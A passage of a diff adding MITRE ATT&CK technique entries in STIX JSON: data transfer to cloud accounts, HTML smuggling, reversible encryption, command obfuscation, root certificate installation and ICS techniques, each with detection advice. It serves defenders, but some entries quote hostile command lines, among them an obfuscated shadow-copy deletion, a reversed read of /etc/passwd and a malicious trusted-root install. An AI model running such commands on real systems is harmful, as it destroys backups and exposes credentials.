"phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g. a user has an active login session but has not entered the building or does not have VPN access). ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605", + "created": "2020-02-11T19:05:02.399Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1556/001", + "external_id": "T1556.001" + }, + { + "source_name": "Dell Skeleton", + "description": "Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019.", + "url": "https://www.secureworks.com/research/skeleton-key-malware-analysis" + }, + { + "source_name": "TechNet Audit Policy", + "description": "Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.", + "url": "https://technet.microsoft.com/en-us/library/dn487457.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-11T15:53:00.577Z", + "name": "Transfer Data to Cloud Account", + "description": "Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.\n\nA defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.(Citation: TLDRSec AWS Attacks)\n\nAdversaries may also use cloud-native mechanisms to share victim data with adversary-controlled cloud accounts, such as creating anonymous file sharing links or, in Azure, a shared access signature (SAS) URI.(Citation: Microsoft Azure Storage Shared Access Signature)\n\nIncidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Praetorian", + "Darin Smith, Cisco", + "ExtraHop", + "Gabriel Currie" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. \n\nIn AWS, sharing an Elastic Block Store (EBS) snapshot, either with specified users or publicly, generates a ModifySnapshotAttribute event in CloudTrail logs.(Citation: AWS EBS Snapshot Sharing) Similarly, in Azure, creating a Shared Access Signature (SAS) URI for a Virtual Hard Disk (VHS) snapshot generates a \"Get Snapshot SAS URL\" event in Activity Logs.(Citation: Azure Blob Snapshots)(Citation: Azure Shared Access Signature)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "SaaS", + "Google Workspace", + "Office 365" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", + "created": "2019-08-30T13:03:04.038Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1537", + "external_id": "T1537" + }, + { + "source_name": "AWS EBS Snapshot Sharing", + "description": "Amazon Web Services. (n.d.). Share an Amazon EBS snapshot. Retrieved March 2, 2022.", + "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html" + }, + { + "source_name": "TLDRSec AWS Attacks", + "description": "Clint Gibler and Scott Piper. (2021, January 4). Lesser Known Techniques for Attacking AWS Environments. Retrieved March 4, 2024.", + "url": "https://tldrsec.com/p/blog-lesser-known-aws-attacks" + }, + { + "source_name": "Azure Shared Access Signature", + "description": "Delegate access with a shared access signature. (2019, December 18). Delegate access with a shared access signature. Retrieved March 2, 2022.", + "url": "https://docs.microsoft.com/en-us/rest/api/storageservices/delegate-access-with-shared-access-signature" + }, + { + "source_name": "Azure Blob Snapshots", + "description": "Microsoft Azure. (2021, December 29). Blob snapshots. Retrieved March 2, 2022.", + "url": "https://docs.microsoft.com/en-us/azure/storage/blobs/snapshots-overview" + }, + { + "source_name": "Microsoft Azure Storage Shared Access Signature", + "description": "Microsoft. (2023, June 7). Grant limited access to Azure Storage resources using shared access signatures (SAS). Retrieved March 4, 2024.", + "url": "https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview" + }, + { + "source_name": "DOJ GRU Indictment Jul 2018", + "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.", + "url": "https://www.justice.gov/file/1080281/download" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-07-14T14:01:41.475Z", + "name": "HTML Smuggling", + "description": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)\n\nAdversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as text/plain and/or text/html. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.\n\nFor example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as msSaveBlob.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Stan Hegt, Outflank", + "Jonathan Boucher, @crash_wave, Bank of Canada", + "Krishnan Subramanian, @krish203", + "Vinay Pidathala" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection of HTML Smuggling is difficult as HTML5 and JavaScript attributes are used by legitimate services and applications. HTML Smuggling can be performed in many ways via JavaScript, developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging.(Citation: Outlflank HTML Smuggling 2018) Detecting specific JavaScript and/or HTML5 attribute strings such as Blob, msSaveOrOpenBlob, and/or download may be a good indicator of HTML Smuggling. These strings may also be used by legitimate services therefore it is possible to raise false positives.\n\nConsider monitoring files downloaded from the Internet, possibly by HTML Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Web Content Filters", + "Static File Analysis" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", + "created": "2021-05-20T12:20:42.219Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027/006", + "external_id": "T1027.006" + }, + { + "source_name": "Outlflank HTML Smuggling 2018", + "description": "Hegt, S. (2018, August 14). HTML smuggling explained. Retrieved May 20, 2021.", + "url": "https://outflank.nl/blog/2018/08/14/html-smuggling-explained/" + }, + { + "source_name": "MSTIC NOBELIUM May 2021", + "description": "Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/" + }, + { + "source_name": "HTML Smuggling Menlo Security 2020", + "description": "Subramanian, K. (2020, August 18). New HTML Smuggling Attack Alert: Duri. Retrieved May 20, 2021.", + "url": "https://www.menlosecurity.com/blog/new-attack-alert-duri" + }, + { + "source_name": "nccgroup Smuggling HTA 2017", + "description": "Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved May 20, 2021.", + "url": "https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Reversible Encryption", + "description": "An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)\n\nIf the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:\n\n1. Encrypted password (G$RADIUSCHAP) from the Active Directory user-structure userParameters\n2. 16 byte randomly-generated value (G$RADIUSCHAPKEY) also from userParameters\n3. Global LSA secret (G$MSRADIUSCHAPKEY)\n4. Static key hardcoded in the Remote Access Subauthentication DLL (RASSFM.DLL)\n\nWith this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.(Citation: how_pwd_rev_enc_1)(Citation: how_pwd_rev_enc_2)\n\nAn adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://attack.mitre.org/techniques/T1059/001) module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to \"Windows Server 2008\" or higher.(Citation: dump_pwd_dcsync) In PowerShell, an adversary may make associated changes to user settings using commands similar to Set-ADUser -AllowReversiblePasswordEncryption $true.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor property changes in Group Policy: Computer Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password Policy\\Store passwords using reversible encryption. By default, the property should be set to Disabled.\n\nMonitor command-line usage for -AllowReversiblePasswordEncryption $true or other actions that could be related to malicious tampering of user settings (i.e. [Group Policy Modification](https://attack.mitre.org/techniques/T1484/001)). Furthermore, consider monitoring and/or blocking suspicious execution of Active Directory PowerShell modules, such as Set-ADUser and Set-ADAccountControl, that change account configurations. \n\nMonitor Fine-Grained Password Policies and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48", + "created": "2022-01-13T20:02:28.349Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1556/005", + "external_id": "T1556.005" + }, + { + "source_name": "store_pwd_rev_enc", + "description": "Microsoft. (2021, October 28). Store passwords using reversible encryption. Retrieved January 3, 2022.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption" + }, + { + "source_name": "how_pwd_rev_enc_1", + "description": "Teusink, N. (2009, August 25). Passwords stored using reversible encryption: how it works (part 1). Retrieved November 17, 2021.", + "url": "http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html" + }, + { + "source_name": "how_pwd_rev_enc_2", + "description": "Teusink, N. (2009, August 26). Passwords stored using reversible encryption: how it works (part 2). Retrieved November 17, 2021.", + "url": "http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html" + }, + { + "source_name": "dump_pwd_dcsync", + "description": "Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.", + "url": "https://adsecurity.org/?p=2053" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Command Obfuscation", + "description": "Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)\n\nFor example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing, `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`“Wor”+“d.Application”`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017)\n\nAdversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\\voi\\pcw\\..\\..\\Windows\\tei\\qs\\k\\..\\..\\..\\system32\\erool\\..\\wbem\\wg\\je\\..\\..\\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC)\n\nTools such as Invoke-Obfuscation and Invoke-DOSfucation have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "TruKno", + "Tim Peck", + "George Thomas" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", + "created": "2023-03-14T17:36:01.022Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027/010", + "external_id": "T1027.010" + }, + { + "source_name": "Twitter Richard WMIC", + "description": "Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.", + "url": "https://twitter.com/rfackroyd/status/1639136000755765254" + }, + { + "source_name": "Invoke-Obfuscation", + "description": "Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved March 17, 2023.", + "url": "https://github.com/danielbohannon/Invoke-Obfuscation" + }, + { + "source_name": "Invoke-DOSfuscation", + "description": "Bohannon, D. (2018, March 19). Invoke-DOSfuscation. Retrieved March 17, 2023.", + "url": "https://github.com/danielbohannon/Invoke-DOSfuscation" + }, + { + "source_name": "FireEye Obfuscation June 2017", + "description": "Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.", + "url": "https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html" + }, + { + "source_name": "Malware Monday VBE", + "description": "Bromiley, M. (2016, December 27). Malware Monday: VBScript and VBE Files. Retrieved March 17, 2023.", + "url": "https://bromiley.medium.com/malware-monday-vbscript-and-vbe-files-292252c1a16" + }, + { + "source_name": "Akamai JS", + "description": "Katz, O. (2020, October 26). Catch Me if You Can—JavaScript Obfuscation. Retrieved March 17, 2023.", + "url": "https://www.akamai.com/blog/security/catch-me-if-you-can-javascript-obfuscation" + }, + { + "source_name": "Bashfuscator Command Obfuscators", + "description": "LeFevre, A. (n.d.). Bashfuscator Command Obfuscators. Retrieved March 17, 2023.", + "url": "https://bashfuscator.readthedocs.io/en/latest/Mutators/command_obfuscators/index.html" + }, + { + "source_name": "Microsoft PowerShellB64", + "description": "Microsoft. (2023, February 8). about_PowerShell_exe: EncodedCommand. Retrieved March 17, 2023.", + "url": "https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1#-encodedcommand-base64encodedcommand" + }, + { + "source_name": "RC PowerShell", + "description": "Red Canary. (n.d.). 2022 Threat Detection Report: PowerShell. Retrieved March 17, 2023.", + "url": "https://redcanary.com/threat-detection-report/techniques/powershell/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Install Root Certificate", + "description": "Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental)\n\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)\n\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)\n\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Itzik Kotler, SafeBreach", + "Travis Smith, Tripwire", + "Red Canary", + "Matt Graeber, @mattifestation, SpecterOps" + ], + "x_mitre_detection": "A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)\n\nInstalled root certificates are located in the Registry under HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\ and [HKLM or HKCU]\\Software[\\Policies\\]\\Microsoft\\SystemCertificates\\Root\\Certificates\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)\n\n* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\n* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\n* 3B1EFD3A66EA28B16697394703A72CA340A05BD5\n* 7F88CD7223F3C813818C994614A89C99FA3B5247\n* 8F43288AD272F3103B6FB1428485EA3014C0BCFE\n* A43489159A520F0D93D032CCAF37E7FE20A8B419\n* BE36A4562FB2EE05DBB3D32323ADF445084ED656\n* CDD4EEAE6000AC7F40C3802C171E30148030C072", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Digital Certificate Validation" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d519cfd5-f3a8-43a9-a846-ed0bb40672b1", + "created": "2017-05-31T21:31:42.750Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1130", + "external_id": "T1130" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/479.html", + "external_id": "CAPEC-479" + }, + { + "source_name": "Wikipedia Root Certificate", + "description": "Wikipedia. (2016, December 6). Root certificate. Retrieved February 20, 2017.", + "url": "https://en.wikipedia.org/wiki/Root_certificate" + }, + { + "source_name": "Operation Emmental", + "description": "Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding Holes Operation Emmental. Retrieved February 9, 2016.", + "url": "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf" + }, + { + "source_name": "Kaspersky Superfish", + "description": "Onuma. (2015, February 24). Superfish: Adware Preinstalled on Lenovo Laptops. Retrieved February 20, 2017.", + "url": "https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/" + }, + { + "source_name": "SpectorOps Code Signing Dec 2017", + "description": "Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.", + "url": "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec" + }, + { + "source_name": "objective-see ay mami 2018", + "description": "Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March 19, 2018.", + "url": "https://objective-see.com/blog/blog_0x26.html" + }, + { + "source_name": "Microsoft Sigcheck May 2017", + "description": "Russinovich, M. et al.. (2017, May 22). Sigcheck. Retrieved April 3, 2018.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sigcheck" + }, + { + "source_name": "Tripwire AppUNBlocker", + "description": "Smith, T. (2016, October 27). AppUNBlocker: Bypassing AppLocker. Retrieved December 19, 2017.", + "url": "https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Data Encrypted", + "description": "Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.\n\nOther exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Encryption software and encrypted files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known encryption utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used. Often the encryption key is stated within command-line invocation of the software. \n\nA process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures. \n\nNetwork traffic may also be analyzed for entropy to determine if encrypted data is being transmitted. (Citation: Zhang 2013) If the communications channel is unencrypted, encrypted files of known file types can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d54416bd-0803-41ca-870a-ce1af7c05638", + "created": "2017-05-31T21:30:30.260Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1022", + "external_id": "T1022" + }, + { + "source_name": "Zhang 2013", + "description": "Zhang, H., Papadopoulos, C., & Massey, D. (2013, April). Detecting encrypted botnet traffic. Retrieved August 19, 2015.", + "url": "http://www.netsec.colostate.edu/~zhang/DetectingEncryptedBotnetTraffic.pdf" + }, + { + "source_name": "Wikipedia File Header Signatures", + "description": "Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.", + "url": "https://en.wikipedia.org/wiki/List_of_file_signatures" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:11.536Z", + "name": "Remote System Discovery", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques. Functionality could exist within adversary tools to enable this, but utilities available on the operating system or vendor software could also be used. (Citation: Enterprise ATT&CK January 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "File: File Access", + "Process: Process Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0846", + "external_id": "T0846" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Remote System Discovery Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1018" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Engineering Workstation Compromise", + "description": "Adversaries will compromise and gain control of an engineering workstation for Initial Access into the control system environment. Access to an engineering workstation may occur through or physical means, such as a Valid Accounts with privileged access or infection by removable media. A dual-homed engineering workstation may allow the adversary access into multiple networks. For example, unsegregated process control, safety system, or information system networks. An Engineering Workstation is designed as a reliable computing platform that configures, maintains, and diagnoses control system equipment and applications. Compromise of an engineering workstation may provide access to, and control of, other control system applications and equipment. In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + 